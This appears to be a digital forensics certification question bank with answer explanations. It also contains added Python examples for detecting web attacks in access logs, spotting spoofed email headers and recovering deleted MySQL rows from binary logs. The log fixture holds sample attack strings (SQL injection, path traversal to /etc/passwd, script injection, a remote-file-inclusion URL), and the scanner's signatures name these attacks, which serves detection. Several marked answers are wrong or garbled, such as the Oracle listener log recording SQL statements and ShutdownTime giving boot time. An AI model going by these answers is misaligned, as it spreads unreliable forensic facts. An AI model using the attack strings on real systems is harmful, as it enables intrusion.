
Why: LNK files (shortcuts) are created automatically when a user opens a file, and they contain metadata such as the target path and timestamps.


Domain 8: OS and File System Forensics


Q1 (medium)

During a forensic investigation of a compromised Linux server, an investigator needs to recover deleted files from an ext4 filesystem. Which method should the investigator use to maximize recovery of file content, considering the filesystem may have been partially overwritten?

A

Use 'foremost' to carve files based on file headers and footers.

Foremost is a file carving tool that recovers files by scanning for known headers/footers, making it effective for partially overwritten filesystems.

B

Use 'grep -a' to search the raw disk for file signatures.

C

Use 'scalpel' to perform a deep scan of the filesystem.

D

Use 'extundelete' to recover files from the ext4 filesystem.

Why: Foremost is the correct choice because it performs file carving based on headers and footers, which can recover file content even when the filesystem metadata (such as inodes) is damaged or partially overwritten. Unlike undelete tools that rely on intact filesystem structures, foremost scans the raw disk blocks for known file signatures, making it effective for recovering files from an ext4 filesystem that has experienced partial overwriting.

Q2 (hard)

A forensic analyst is examining a Windows 10 system and needs to determine the last boot time of the system. Which registry hive and key should the analyst query to find this information?

A

NTUSER.DAT hive, key 'Control Panel\Desktop\'

B

SYSTEM hive, key 'CurrentControlSet\Control\Windows\', value 'ShutdownTime'

The 'ShutdownTime' value in this key records the last system shutdown time, which can be used to infer the last boot time (as the system boots after shutdown).

C

SOFTWARE hive, key 'Microsoft\Windows NT\CurrentVersion\'

D

SAM hive, key 'SAM\Domains\Account\Users\'

Why: The SYSTEM hive stores system-wide configuration data, and the key 'CurrentControlSet\Control\Windows\' contains the 'ShutdownTime' value, which records the last system shutdown time. Since the last boot time is effectively the time after the last shutdown, querying this value provides the necessary information. This is a standard forensic artifact for determining system uptime and boot events on Windows 10.

Q3 (easy)

During a forensic investigation, an analyst needs to preserve the integrity of evidence on a hard drive. Which of the following is the best practice for acquiring an image of the drive?

A

Use the 'dd' command to create a raw image without a write blocker.

B

Connect the drive to a forensic workstation and use the operating system's copy command.

C

Use a hardware write blocker and create a bit-stream image.

A write blocker ensures no data is altered on the original drive during acquisition.

D

Format the drive before imaging to ensure no hidden data is missed.

Why: Option C is correct because using a hardware write blocker ensures that no write commands from the forensic workstation reach the suspect drive, preserving its integrity at the physical level. Creating a bit-stream image (sector-by-sector copy) captures all data, including slack space and unallocated clusters, which is essential for thorough forensic analysis. This combination is the gold standard in digital forensics, as mandated by best practices like those from NIST and the ACPO principles.

Q4 (medium)

Which TWO of the following are valid locations in a Windows system where forensic evidence of USB device connection can be found?

A

SYSTEM\CurrentControlSet\Enum\USBSTOR registry key

This key enumerates all USB storage devices that have been connected to the system.

B

Amcache.hve file

C

SetupAPI.dev.log file

This log file records Plug and Play device installations, including USB devices.

D

Event Logs with source 'Device Setup'

E

C:\Windows\Prefetch folder

Why: The SYSTEM\CurrentControlSet\Enum\USBSTOR registry key is a primary location where Windows records every USB storage device that has been connected to the system. Each device is listed under this key with a unique instance ID, including the vendor ID, product ID, and serial number, providing persistent evidence of USB connections even after the device is removed.

Q5 (medium)

You are a forensic investigator responding to a security incident at a medium-sized company. The incident involved an attacker gaining unauthorized access to a Windows Server 2019 system. The server was taken offline by the IT team immediately after detection. Your task is to acquire forensic evidence from the server's hard drive. The server has a single 500 GB NTFS partition. You have a forensic workstation with a write blocker, a SATA-to-USB adapter, and a forensic imaging tool that supports both dd and EWF (E01) formats. The server is still physically in the server room, and the IT team has powered it off. You need to create a forensic image that preserves the integrity of the evidence and allows for efficient analysis. Which of the following is the most appropriate course of action?

A

Boot the server using a forensic live CD, connect an external USB drive to the server, and use 'dd' to create a raw image on the external drive.

B

Use the server's built-in backup utility to create a system state backup and copy it to a network share.

C

Remove the hard drive, connect it via a write blocker to the forensic workstation, and then use 'dd' over a network connection to send the image to a remote server.

D

Remove the hard drive, connect it via a write blocker to the forensic workstation, and create an EWF (E01) image stored locally on the forensic workstation's internal drive.

This method uses a write blocker to preserve integrity, and EWF format provides compression and metadata for efficient analysis.

Why: Option D is correct because it follows best practices for forensic acquisition: removing the hard drive and connecting it via a write blocker ensures that no data is altered during imaging. Using EWF (E01) format provides compression, metadata, and integrity checks (e.g., CRC32, MD5, SHA-1), which are essential for efficient analysis and evidence preservation. Storing the image locally on the forensic workstation avoids network latency and potential data corruption.

Q6 (medium)

During a forensic investigation of a Windows 10 system, you need to analyze the file system to recover deleted files. Which TWO file system artifacts would be most useful for this purpose?

A

$LogFile

The $LogFile records metadata changes, including deletions; can help reconstruct file history.

B

$Boot file

C

$MFT (Master File Table)

The MFT contains file records; even after deletion, the record may remain until overwritten.

D

$Volume

E

$Bitmap

Why: $LogFile (A) records metadata changes to the NTFS volume, including transactions that can be replayed to recover file names and directory entries for recently deleted files. $MFT (C) contains the master file table entries for every file and directory; even after deletion, the MFT entry often remains until overwritten, allowing recovery of file attributes and data runs.


Domain 9: Application, Email and Cloud Forensics


Q1 (easy)

A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?

A

Cross-site scripting (XSS)

B

Path traversal

C

Remote file inclusion

D

SQL injection

The UNION SELECT clause indicates an attempt to extract data from the database.

Why: The log entry shows a UNION SELECT statement appended to the id parameter, which is a classic SQL injection attempt.
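
How an analyst turns this kind of review into repeatable detection, as an added Python example that is not part of the original page: each Apache combined-format line is parsed, the request target is URL-decoded (so `UNION%20SELECT` is not missed), and the decoded target is checked against signatures for the four attack classes named in the options. The sample log is constructed for the demo; its first line is the entry quoted in the question, the others use TEST-NET addresses.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Apache combined log format. The request target is captured lazily and the
# protocol anchored, because an injected payload can itself contain spaces.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Detection signatures, evaluated against the decoded, lower-cased target.
# Deliberately narrow: the aim is to flag the classic forms for review,
# not to be a complete WAF rule set.
SIGNATURES = [
    ("sql_injection", re.compile(r"\bunion\b[\s/*+]+(?:all[\s/*+]+)?select\b|\bor\b\s+\d+\s*=\s*\d+", re.I)),
    ("path_traversal", re.compile(r"(?:\.\./|\.\.\\){2,}|/etc/passwd", re.I)),
    ("xss", re.compile(r"<\s*script|javascript:", re.I)),
    ("remote_file_inclusion", re.compile(r"=\s*(?:https?|ftp)://", re.I)),
]

# Constructed sample log (first line is the entry from the question above).
SAMPLE_LOG = """\
192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:08:12:40 +0000] "GET /index.php?id=1 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Jan/2024:08:13:02 +0000] "GET /index.php?id=1%20UNION%20ALL%20SELECT%201,2,3-- HTTP/1.1" 500 512 "-" "curl/8.0"
203.0.113.9 - - [10/Jan/2024:08:13:30 +0000] "GET /download.php?file=../../../../etc/passwd HTTP/1.1" 200 1890 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jan/2024:08:14:01 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Jan/2024:08:15:12 +0000] "GET /page.php?include=http://203.0.113.9/x.txt HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(target: str) -> List[str]:
    """Labels for every signature that matches the (doubly) URL-decoded request target.
    Decoding twice catches the common double-encoding evasion."""
    decoded = unquote_plus(unquote_plus(target))
    return [label for label, rx in SIGNATURES if rx.search(decoded)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Parse each line and keep only those that trip at least one signature,
    together with the response status, which tells the reviewer whether the
    server answered the request successfully (200) or rejected it."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if not entry:
            continue
        labels = classify(entry["target"])
        if labels:
            hits.append({"ip": entry["ip"], "ts": entry["ts"], "status": entry["status"],
                         "target": entry["target"], "labels": labels})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit["ip"], hit["status"], hit["labels"], hit["target"])
```

A 200 response to a flagged request, as in the question's line, does not by itself prove the injection worked, but it is the reason such hits are triaged ahead of ones the application rejected.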

Q2 (medium)

During an investigation, an analyst extracts email headers from a suspicious email. The header includes: Received: from mail.attacker.com (192.168.1.100); DKIM-Signature: v=1; a=rsa-sha256; d=legitbank.com; s=selector1; bh=...; The email claims to be from support@legitbank.com. Which indicator strongly suggests email spoofing?

A

The email was sent on a weekend

B

The DKIM signature uses RSA-SHA256 algorithm

C

The X-Originating-IP header is present

D

The Received header shows the email came from a server not owned by legitbank.com

Legitimate emails from legitbank.com would originate from their own mail servers, not attacker.com.

Why: The DKIM-Signature domain (d=legitbank.com) should match the sender domain. However, the Received header shows the email originated from mail.attacker.com, not from legitbank.com's mail servers. DKIM signature verification may also fail if the signature does not match, but the mismatch in origin is a clear spoofing indicator.
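
The header comparison described above, as an added Python example (not the page's or any vendor's code): the first-hop `Received` header is located, its sending host is compared with the `From` domain, and the DKIM `d=` tag is compared with the `From` domain as well. Both messages are constructed for the demo; the first reproduces the headers quoted in the question. The "registrable domain" helper simply takes the last two labels, an assumption made to keep the example self-contained rather than a public-suffix-list lookup.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from typing import Dict, List, Optional

# Constructed messages (not real mail). SPOOFED mirrors the question: DKIM says
# legitbank.com and From says support@legitbank.com, but the first hop is
# mail.attacker.com. LEGIT is the same mail arriving from legitbank's own server.
SPOOFED = """\
Received: from mx.example-recipient.com (mx.example-recipient.com [203.0.113.10])
\tby inbox.example-recipient.com; Wed, 10 Jan 2024 08:12:35 +0000
Received: from mail.attacker.com (192.168.1.100)
\tby mx.example-recipient.com; Wed, 10 Jan 2024 08:12:34 +0000
DKIM-Signature: v=1; a=rsa-sha256; d=legitbank.com; s=selector1; bh=...;
From: "LegitBank Support" <support@legitbank.com>
Subject: Urgent account verification

Body text.
"""

LEGIT = """\
Received: from mail.legitbank.com (mail.legitbank.com [198.51.100.5])
\tby mx.example-recipient.com; Wed, 10 Jan 2024 09:00:00 +0000
DKIM-Signature: v=1; a=rsa-sha256; d=legitbank.com; s=selector1; bh=...;
From: "LegitBank Support" <support@legitbank.com>
Subject: Monthly statement

Body text.
"""

RECEIVED_FROM_RE = re.compile(r"from\s+(?P<host>[A-Za-z0-9][A-Za-z0-9.-]*)", re.IGNORECASE)
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def registrable_domain(host: str) -> str:
    """Last two DNS labels, e.g. mail.attacker.com -> attacker.com (demo assumption)."""
    labels = host.lower().strip().rstrip(".").split(".")
    return ".".join(labels[-2:])


def analyze_headers(raw_message: str) -> Dict[str, object]:
    """Extract From, DKIM d= and the first-hop Received host, and list spoofing indicators."""
    msg = message_from_string(raw_message)

    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()

    dkim = msg.get("DKIM-Signature", "") or ""
    m = re.search(r"(?:^|;)\s*d=([^;\s]+)", dkim)
    dkim_domain: Optional[str] = m.group(1).lower() if m else None

    # Each relay prepends its own Received header, so the last one in the
    # message is the earliest hop: the server the message actually came from.
    received = msg.get_all("Received") or []
    origin = received[-1] if received else ""
    hm = RECEIVED_FROM_RE.search(origin)
    origin_host: Optional[str] = hm.group("host").lower() if hm else None
    im = IPV4_RE.search(origin)
    origin_ip: Optional[str] = im.group(0) if im else None

    indicators: List[str] = []
    if not received:
        indicators.append("no Received headers")
    if origin_host and from_domain and registrable_domain(origin_host) != registrable_domain(from_domain):
        indicators.append("first-hop host domain differs from From domain")
    if dkim_domain and from_domain and registrable_domain(dkim_domain) != registrable_domain(from_domain):
        indicators.append("DKIM d= domain differs from From domain")

    return {"from_domain": from_domain, "dkim_domain": dkim_domain,
            "origin_host": origin_host, "origin_ip": origin_ip, "indicators": indicators}


if __name__ == "__main__":
    for name, raw in (("spoofed", SPOOFED), ("legit", LEGIT)):
        print(name, analyze_headers(raw))
```

A first-hop mismatch is an indicator, not proof: organisations that send through a third-party bulk-mail provider or a forwarding service show a different first-hop domain legitimately, so the result is corroborated against the receiving server's own SPF, DKIM and DMARC verdicts (its Authentication-Results header) before the message is called spoofed.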

Q3 (hard)

A forensic analyst is examining a Docker container suspected of being used for malicious activities. The container was running an Alpine Linux image and was stopped 2 hours ago. Which of the following is the BEST first step to collect volatile evidence?

A

Collect the container's log files from /var/log/

B

Create a memory dump of the container's process

C

Export the container's filesystem using docker export

docker export creates a tar archive of the container's filesystem, preserving persistent data.

D

Run docker attach to reconnect to the container

Why: When a container is stopped, its process state and other in-memory data are lost. The best first step is to create a forensic image of the container's filesystem layers, which are still available on the host. Docker containers' filesystems are stored as layers on the host, accessible via docker export or by copying the container's filesystem from /var/lib/docker/overlay2/.

Q4 (medium)

A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?

A

AWS CloudTrail

CloudTrail is the audit log for API activity in AWS.

B

VPC Flow Logs

C

Amazon S3 access logs

D

AWS Config

Why: AWS CloudTrail records all API calls made to the AWS environment, including S3 bucket deletions. It logs the identity, source IP, and request parameters.

Q5 (easy)

Which tool is specifically designed to analyze email headers and track the path an email took across mail servers?

A

Wireshark

B

Volatility

C

EmailTracker

EmailTracker is purpose-built for email header forensics.

D

FTK Imager

Why: EmailTracker is a tool that parses email headers and visualizes the route, timing, and geolocation of mail servers.

Q6 (medium)

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

A

Server-side request forgery (SSRF)

B

SQL injection

C

Webshell

A webshell allows remote command execution via a script file placed on the server.

D

Cross-site request forgery (CSRF)

Why: A file that accepts and executes commands remotely is a webshell, often placed via file upload vulnerabilities to maintain access.


Domain 10: Mobile and Malware Forensics


Q1 (easy)

During a mobile forensics investigation, an analyst needs to acquire data from an iPhone that cannot be bypassed via passcode. The device is locked, and the analyst has the passcode. Which acquisition method provides the MOST comprehensive data extraction?

A

Physical acquisition

Physical acquisition creates a full image of the device's storage, retrieving all data including deleted files.

B

Manual acquisition

C

Logical acquisition

D

File system acquisition

Why: Physical acquisition is the most comprehensive method because it creates a bit-for-bit copy of the entire flash storage, including the operating system, kernel, unallocated space, and deleted file remnants. Even with the passcode known, a locked iPhone restricts file system access via USB, but physical acquisition (often using advanced techniques like JTAG or chip-off) bypasses these restrictions to extract the raw NAND data, yielding the fullest forensic picture.

Q2 (medium)

A security analyst is reviewing output from a Cuckoo Sandbox analysis of a suspicious executable. The report shows that the process created a mutex named 'Global\GLOBAL_MUTEX_123' and modified the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\. Which behavioral indicator is MOST evident?

A

Command and control communication

B

Persistence mechanism

The 'Run' key is a common persistence location to launch malware at startup.

C

Anti-debugging technique

D

Privilege escalation

Why: The modification of the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run is a classic persistence mechanism. This key is automatically processed by Windows Explorer at user logon, causing any executable listed there to run. Combined with the mutex creation (which prevents multiple instances), the behavioral indicator is clearly an attempt to establish persistence on the host.

Q3 (hard)

In an Android forensic investigation, an examiner extracts the /data/data/com.whatsapp/databases/msgstore.db file. The database contains a table 'messages' with columns 'key_remote_jid', 'data', and 'timestamp'. Which SQL query would retrieve all messages sent to a specific contact with a phone number ending in '1234'?

A

SELECT * FROM messages WHERE key_remote_jid = '%1234%'

B

SELECT * FROM messages WHERE key_remote_jid LIKE '%1234%'

'key_remote_jid' contains the recipient's JID; LIKE '%1234%' matches any JID ending in 1234.

C

SELECT * FROM messages WHERE data LIKE '%1234%'

D

SELECT * FROM messages WHERE timestamp LIKE '%1234%'

Why: Option B is correct because the `key_remote_jid` column stores the remote party's identifier (e.g., a phone number with country code), and the `LIKE '%1234%'` pattern matches any value containing '1234' anywhere in the string. This retrieves all messages where the contact's phone number ends with '1234', as required by the question.

Q4 (easy)

A forensic analyst is examining a Windows malware sample using static analysis. Which tool is BEST suited for viewing the PE header structure, including sections, imports, and exports?

A

Strings

B

Ghidra

C

IDA Pro

D

PEiD

PEiD is a tool for analyzing PE files, detecting packers, and viewing header information.

Why: PEiD is specifically designed to analyze PE (Portable Executable) headers, making it ideal for quickly viewing section tables, import/export tables, and detecting packers or compilers. It parses the IMAGE_NT_HEADERS structure directly, providing a concise summary of the PE layout without requiring disassembly or decompilation.

Q5 (medium)

During an iOS forensic examination, an analyst extracts an iTunes backup and finds the file '3d0d7e5fb2ce288813306e4d4636395e047a3d28'. Which type of data does this file typically contain?

A

Call history

B

SMS and iMessage conversations

C

Keychain data

D

Notes app data

The hash corresponds to the Notes app's SQLite database (NotesStore.sqlite).

Why: The file '3d0d7e5fb2ce288813306e4d4636395e047a3d28' is the SQLite database (NotesStore.sqlite) that stores Apple's Notes app data in an iOS backup. Its SHA-1 hash name corresponds to the domain 'AppDomain-com.apple.mobilenotes' and contains the notes, attachments, and metadata. This is a well-known artifact in iOS forensics for recovering user-created notes.

Q6 (medium)

A forensic examiner is analyzing an Android device that has been factory reset. Which artefact is MOST likely to persist after a factory reset, providing potential evidence of prior usage?

A

Google account artefacts

Google account credentials may be stored in the Google backup and could be restored after reset, or remnants may exist in the cloud.

B

App installation logs

C

Deleted SMS messages

D

Wi-Fi passwords

Why: Google account artefacts, such as the Google Services Framework (GSF) ID and the device's Google Account (GAIA) ID, are stored in the /data/system/ partition and are often retained even after a factory reset because the reset does not always wipe the cryptographic keys or the persistent data blocks used by Google's sync services. This allows forensic tools to recover the previously synced account details, providing evidence of prior usage.


Domain 11: Network and Cloud Forensics


Q1 (easy)

An investigator needs to capture network traffic from a live network segment without altering the traffic flow. Which technique should they use?

A

Enable NetFlow on the router and capture flows

B

Configure a SPAN port on the switch

Port mirroring (SPAN) copies traffic to a monitor port without interrupting the original flow.

C

Deploy an ARP spoofing tool to redirect traffic

D

Set the NIC to promiscuous mode on the forensic workstation

Why: A SPAN (Switched Port Analyzer) port, also known as a mirror port, copies all traffic from a specified source port or VLAN to a destination port where the forensic workstation is connected. This allows the investigator to capture traffic without injecting any frames or altering the forwarding behavior of the switch, thus preserving the integrity of the live network segment.

Q2 (medium)

During a cloud forensics investigation, the investigator discovers that the cloud provider uses shared storage for multiple tenants. Which challenge is MOST likely to arise when acquiring a forensic image?

A

Physical acquisition of the storage device is required

B

No API access to the storage system

C

Inability to decrypt data at rest

D

Data commingling with other tenants

Shared storage can result in data from multiple tenants occupying the same physical media, complicating isolation.

Why: In cloud environments with shared storage, data from multiple tenants resides on the same physical or logical volume. When acquiring a forensic image, the investigator cannot isolate a single tenant's data without also capturing other tenants' data, leading to data commingling. This violates chain-of-custody and privacy principles, making it the primary challenge.

Q3 (hard)

A forensic analyst is investigating a network breach and finds that the attacker used a technique that bypasses Network Access Control (NAC). Which of the following methods is commonly used to evade 802.1X authentication?

A

MAC address spoofing

Spoofing the MAC of an authorized device can allow the attacker to authenticate via 802.1X.

B

VLAN hopping using double tagging

C

DNS tunneling to exfiltrate data

D

ARP poisoning to redirect traffic

Why: MAC address spoofing is commonly used to bypass 802.1X authentication because 802.1X typically authenticates devices based on their MAC address after the EAP (Extensible Authentication Protocol) handshake. By spoofing the MAC address of an already-authenticated device, the attacker can impersonate that device and gain network access without valid credentials, effectively bypassing the NAC enforcement.

Q4 (easy)

A security team needs to preserve network evidence for a potential legal case. What is the BEST practice for capturing volatile network data?

A

Wait until normal business hours to capture traffic

B

Only record summary logs from the firewall

C

Perform packet capture using a portable tool and store the capture with a cryptographic hash

This ensures minimal impact and integrity of the captured data.

D

Use a dedicated forensic workstation with a write blocker

Why: Option C is correct because capturing volatile network data requires immediate acquisition of live traffic before it is lost, and using a portable tool (e.g., tcpdump, Wireshark) allows rapid deployment. Storing the capture with a cryptographic hash (e.g., SHA-256) ensures data integrity and chain of custody, which is essential for admissibility in legal proceedings. This approach preserves the most volatile evidence (packet contents) while providing verifiable proof that the data has not been altered.

Q5 (medium)

In a cloud forensic investigation, the analyst needs to obtain a memory dump of a virtual machine. Which method is considered forensically sound?

A

Log into the VM and use a tool to create a crash dump

B

Copy the virtual disk file (.vmdk) and extract memory from it

C

Use a live forensic tool inside the VM to capture memory

D

Take a snapshot of the VM via the hypervisor and export the .vmem file

This method captures the VM's memory in a forensically sound manner.

Why: Option D is forensically sound because taking a snapshot of the VM via the hypervisor and exporting the .vmem file captures the entire volatile memory state from outside the guest OS, without altering any data inside the VM. This method preserves the memory in its pristine state and avoids the contamination that occurs when executing tools inside the suspect VM.

Q6 (hard)

An organization uses a cloud-based SIEM to collect logs from multiple sources. The investigator notices gaps in the log data for a critical system during the incident timeframe. What is the MOST likely cause?

A

Network latency delayed log delivery

B

Log rotation policy deleted logs prematurely

C

Time drift between the system and the SIEM

Clock skew can cause logs to appear missing or out of order.

D

The system's log level was set to ERROR only

Why: Time drift between the system and the SIEM causes logs to be timestamped incorrectly, leading to apparent gaps when the SIEM queries by time range. Even if logs are delivered, they may fall outside the incident timeframe in the SIEM's index, creating the illusion of missing data. This is a common issue in cloud-based SIEMs where NTP synchronization is not enforced across all sources.


Domain 12: Database and Application Forensics


Q1 (medium)

During a database forensic investigation, an analyst discovers that multiple rows in a MySQL table have been deleted. The binary logs are enabled. Which approach should the analyst use to recover the deleted data?

A

Restore the transaction log files from backup and mount them to recover the deleted rows.

B

Use the 'SHOW UNDO' command to retrieve the deleted rows from undo tablespace.

C

Query the information_schema database to retrieve deleted rows from the data dictionary.

D

Parse the binary logs using mysqlbinlog to extract the DELETE statements and reconstruct the lost data.

Binary logs record all data changes; mysqlbinlog can output the SQL statements, including deletes.

Why: MySQL binary logs record all changes to the database, including DELETE statements. The mysqlbinlog utility can parse these logs to reconstruct the exact DELETE operations, allowing the analyst to reverse-engineer the deleted rows by extracting the row data from the log events. This is the standard forensic method for recovering deleted data when binary logging is enabled.
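
The reconstruction step the explanation describes, as an added Python example that is not part of the original page: with row-based logging, `mysqlbinlog -v --base64-output=DECODE-ROWS` prints each deleted row as a pseudo-SQL `DELETE FROM` block followed by the old column values as `@1`, `@2`, ... The code parses such an excerpt and rebuilds the matching `INSERT` statements. The excerpt itself is constructed in that format for the demo, not output from a real server, and the column order in the rebuilt rows is the table's column order at the time of the event, which the analyst still has to confirm against the schema.

```python
import re
from typing import Dict, List

# Constructed excerpt in the shape of `mysqlbinlog -v` output for a Delete_rows
# event (two rows deleted from shop.customers). Not from a real server.
BINLOG_EXCERPT = """\
#240110  8:12:35 server id 1  end_log_pos 1234 CRC32 0x1a2b3c4d \tDelete_rows: table id 108 flags: STMT_END_F
### DELETE FROM `shop`.`customers`
### WHERE
###   @1=42
###   @2='alice'
###   @3='alice@example.com'
### DELETE FROM `shop`.`customers`
### WHERE
###   @1=43
###   @2='bob'
###   @3=NULL
# at 1234
"""

DELETE_RE = re.compile(r"^###\s+DELETE FROM\s+(?P<table>`[^`]+`\.`[^`]+`)\s*$")
VALUE_RE = re.compile(r"^###\s+@(?P<idx>\d+)=(?P<value>.*)$")
# With -vv, mysqlbinlog appends type metadata such as
# "/* INT meta=0 nullable=0 is_null=0 */" after each value; strip it.
META_COMMENT_RE = re.compile(r"\s*/\*.*?\*/\s*$")


def parse_deleted_rows(binlog_text: str) -> List[Dict[str, object]]:
    """Collect every DELETE row event as {"table": ..., "values": [literal, ...]}.

    Values are kept as the SQL literals mysqlbinlog printed (quoted strings,
    numbers, NULL), so they can be reused verbatim in an INSERT."""
    rows: List[Dict[str, object]] = []
    current = None
    for line in binlog_text.splitlines():
        m = DELETE_RE.match(line)
        if m:
            current = {"table": m.group("table"), "values": {}}
            rows.append(current)
            continue
        v = VALUE_RE.match(line)
        if v and current is not None:
            current["values"][int(v.group("idx"))] = META_COMMENT_RE.sub("", v.group("value"))
    # Order the columns by their @index so the rebuilt row matches the table layout.
    for row in rows:
        row["values"] = [row["values"][i] for i in sorted(row["values"])]
    return rows


def rebuild_inserts(rows: List[Dict[str, object]]) -> List[str]:
    """Turn each parsed DELETE row back into an INSERT statement for recovery."""
    return [
        "INSERT INTO {} VALUES ({});".format(row["table"], ", ".join(row["values"]))
        for row in rows
    ]


if __name__ == "__main__":
    for stmt in rebuild_inserts(parse_deleted_rows(BINLOG_EXCERPT)):
        print(stmt)
```

Only `Delete_rows` events are handled here; `Update_rows` events print a `WHERE` block (old values) followed by a `SET` block (new values) and need the same parsing applied to their `WHERE` half to recover pre-change data. Statement-based logging records only the original `DELETE ... WHERE` text, with no row contents, so this recovery depends on the server having used row-based or mixed format.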
Q2 (easy)

A forensic analyst is investigating a compromised web application that uses an Oracle database. The analyst suspects that SQL injection was used to extract sensitive data. Which Oracle log source would provide evidence of the injected SQL statements?

A. Control file
B. Redo log files
C. Listener log (listener.log)
   (With audit enabled, the listener log can capture SQL statements.)
D. Alert log (alert_SID.log)

Why: The listener.log is the correct source because Oracle's listener records all client connections and SQL*Net traffic, including the raw SQL statements sent to the database. When SQL injection is performed, the injected payload is transmitted as part of the SQL query over the network, and the listener log captures these exact statements, providing direct evidence of the attack.
Q3 (hard)

An organization uses Microsoft SQL Server 2019 with full recovery model. A database administrator accidentally executed a DROP TABLE statement. The transaction log was backed up immediately after the incident. Which forensic technique would allow the analyst to restore the dropped table?

A. Restore the transaction log backup taken after the DROP TABLE and apply it to the database.
B. Use the RESTORE LOG statement with the NO_TRUNCATE option to recover the table.
C. Perform a tail-log backup, then restore the full backup and all subsequent transaction log backups, stopping before the DROP TABLE.
   (Point-in-time restore allows recovery to just before the drop.)
D. Restore the most recent full backup and ignore subsequent transaction log backups.

Why: Option C is correct because, under the full recovery model, point-in-time recovery is required to undo the DROP TABLE. By performing a tail-log backup (to capture any transactions after the last log backup), then restoring the full backup and all subsequent transaction log backups with STOPAT or STOPBEFOREMARK to the moment just before the DROP TABLE, the analyst can recover the table without losing other transactions. This is the only method that preserves the dropped table's data while maintaining database consistency.
Q4 (medium)

During a forensic investigation of a MongoDB database, the analyst needs to identify which user executed a particular write operation. Which MongoDB log or feature should the analyst examine?

A. Journal (journal directory)
B. System log (mongod.log)
C. Audit log (auditLog)
   (Audit log records user actions when enabled.)
D. Oplog (local.oplog.rs)

Why: The audit log (auditLog) is the correct source because it is specifically designed to record user authentication and database operations, including which user executed a write operation. MongoDB's audit system captures detailed events such as insert, update, and delete commands along with the authenticated user identity, making it the definitive forensic artifact for user attribution.
Q5 (hard)

A forensic analyst is examining a PostgreSQL database server that was compromised. The attacker gained superuser access and deleted several rows from a critical table. The database is configured with WAL (Write-Ahead Log) archiving. Which method would allow the analyst to identify the exact time the deletions occurred?

A. Review the pg_stat_activity view to see the history of queries executed.
B. Examine the archive_status directory to find the timestamp of the WAL file that contains the deletion.
C. Query the pg_audit table to retrieve a log of all DELETE statements.
D. Use the pg_waldump utility to parse the WAL files and identify DELETE operations with timestamps.
   (pg_waldump can decode WAL records, showing the exact operations and timestamps.)

Why: D is correct because `pg_waldump` is the PostgreSQL utility specifically designed to parse Write-Ahead Log (WAL) files and display their contents in a human-readable format, including the exact timestamps and operation types (e.g., DELETE). Since the database uses WAL archiving, the archived WAL segments will contain a record of every data modification, allowing the analyst to pinpoint when the deletions occurred.
Q6 (easy)

Which TWO of the following are valid methods for collecting volatile data from a live database server during an incident response?

A. Extract the file system journal
B. Take a backup of the database using mysqldump
C. Create a forensic image of the hard disk
D. Execute netstat -an to list active network connections
   (Netstat shows current connections, which are volatile.)
E. Capture a memory dump using a tool like LiME or FTK Imager
   (Memory dump captures volatile data.)

Why: Option D is correct because `netstat -an` lists all active network connections and listening ports without performing DNS resolution, which is critical for identifying unauthorized connections or ongoing data exfiltration from the live database server. This command retrieves data from the kernel's network stack, which is volatile and would be lost if the system were powered down.

Domain 13: Malware Forensics

Q1 (medium)

During a malware investigation, an analyst discovers a suspicious file with a hash value that matches known malware. However, the file fails to execute and does not exhibit any malicious behavior in a sandbox. What is the most likely reason for this discrepancy?

A. The file is a false positive and is actually benign
B. The sandbox is not updated with the latest signatures
C. The file's metadata has been modified to evade analysis
D. The file is packed or obfuscated to prevent execution in a sandbox
   (Packing can prevent execution until unpacked, causing the sandbox to not observe malicious behavior.)

Why: Option D is correct because malware authors often use packing or obfuscation techniques to prevent the malicious payload from executing in an analysis environment. The packed code requires a specific unpacking routine or trigger (e.g., a specific system call, registry key, or timing condition) that the sandbox does not provide, causing the file to appear inert. This is a common anti-sandbox technique distinct from simple signature evasion.
Q2 (hard)

An organization suspects a stealthy malware infection on a critical server. Traditional antivirus and EDR solutions have not detected anything. Which forensic approach would be most effective in identifying the malware, given that it likely resides only in memory?

A. Perform a full disk scan with updated antivirus signatures
B. Acquire a memory dump and perform memory forensics with tools like Volatility
   (Memory forensics captures the malware's code and artifacts in RAM for analysis.)
C. Conduct a live analysis using built-in Windows tools like Task Manager
D. Analyze network traffic for anomalies using a NetFlow analyzer

Why: Option B is correct because the malware resides only in memory, making it invisible to disk-based scans. Memory forensics with tools like Volatility allows investigators to analyze RAM artifacts (e.g., processes, network connections, injected code) to detect stealthy malware that never writes to disk.
Q3 (easy)

A security analyst is tasked with reverse engineering a suspected malware sample. Which initial step should the analyst take to ensure safe handling and prevent accidental infection?

